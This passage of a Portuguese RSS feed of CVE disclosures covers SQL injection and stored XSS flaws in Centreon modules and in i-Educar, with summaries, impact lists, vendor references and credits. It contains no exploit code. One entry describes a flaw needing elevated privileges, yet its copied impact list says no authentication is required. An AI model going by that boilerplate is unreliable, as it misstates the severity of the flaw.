&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário não autenticado pode introduzir injeção de SQL usando o módulo de exportação AWIE.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-15029-injeção-sql&amp;#34;&amp;gt;CVE-2025-15029: Injeção SQL
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-15029&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário não autenticado pode introduzir injeção de SQL usando o módulo de exportação AWIE.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-15029-centreon-awie-critical-severity-5356&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 05 Jan 2026 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-12514</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-12514/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-12514/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-12514-injeção-sql&amp;#34;&amp;gt;CVE-2025-12514: Injeção SQL
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode introduzir uma injeção de SQL usando os parâmetros de configuração das regras de notificação de tickets abertos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-12514-injeção-sql&amp;#34;&amp;gt;CVE-2025-12514: Injeção SQL
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-12514&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode introduzir uma injeção de SQL usando os parâmetros de configuração das regras de notificação de tickets abertos.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-12514-centreon-open-tickets-high-severity-5343&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 22 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54890</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54890/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54890/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54890-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-54890: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração do Hostgroups.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54890-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-54890: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54890&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração do Hostgroups.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54890-centreon-web-medium-severity-5342&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 22 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8460</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8460/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8460/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8460-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-8460: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de neutralização inadequada de entrada durante a geração de páginas da web (XSS ou &amp;#39;Cross-site Scripting&amp;#39;) no Centreon Infra Monitoring (regras de notificação, módulo de tickets abertos) permite a execução de XSS armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring nas versões 24.10.0 a 24.10.5, 24.04.0 a 24.04.5 e 23.10.0 a 23.10.4.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8460-cross-site-scripting-xss-armazenado&amp;#34;&amp;gt;CVE-2025-8460: Cross-Site Scripting (XSS) Armazenado
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8460&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de neutralização inadequada de entrada durante a geração de páginas da web (XSS ou &amp;#39;Cross-site Scripting&amp;#39;) no Centreon Infra Monitoring (regras de notificação, módulo de tickets abertos) permite a execução de XSS armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring nas versões 24.10.0 a 24.10.5, 24.04.0 a 24.04.5 e 23.10.0 a 23.10.4.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Sequestro de sessão: Roubo de cookies ou tokens de autenticação para se passar por outros usuários.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Roubo de credenciais: Coleta de nomes de usuário e senhas usando scripts maliciosos.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Distribuição de malware: Distribuição de código indesejado ou prejudicial às vítimas.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Elevação de privilégios: Comprometimento de usuários administrativos por meio de scripts persistentes.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Manipulação ou adulteração de dados: Alteração ou interrupção do conteúdo do site.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Danos à reputação: Erosão da confiança entre usuários e administradores do site.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-8460-centreon-open-tickets-medium-severity-5344&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 22 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9638</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9638/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9638/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9638-cross-site-scripting-xss-armazenado-no-painel-administrativo&amp;#34;&amp;gt;CVE-2025-9638: Cross-Site Scripting (XSS) Armazenado no Painel Administrativo
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. O problema ocorre porque o parâmetro &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt; não é higienizado antes de ser armazenado no banco de dados. Scripts maliciosos injetados nesse campo persistem no sistema e são executados sempre que o registro afetado é exibido na interface web, levando a uma vulnerabilidade persistente no lado do cliente.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9638-cross-site-scripting-xss-armazenado-no-painel-administrativo&amp;#34;&amp;gt;CVE-2025-9638: Cross-Site Scripting (XSS) Armazenado no Painel Administrativo
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9638&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Cross-Site Scripting (XSS) armazenada foi identificada no endpoint &amp;lt;code&amp;gt;educar_usuario_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. O problema ocorre porque o parâmetro &amp;lt;code&amp;gt;matricula_interna&amp;lt;/code&amp;gt; não é higienizado antes de ser armazenado no banco de dados. Scripts maliciosos injetados nesse campo persistem no sistema e são executados sempre que o registro afetado é exibido na interface web, levando a uma vulnerabilidade persistente no lado do cliente.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
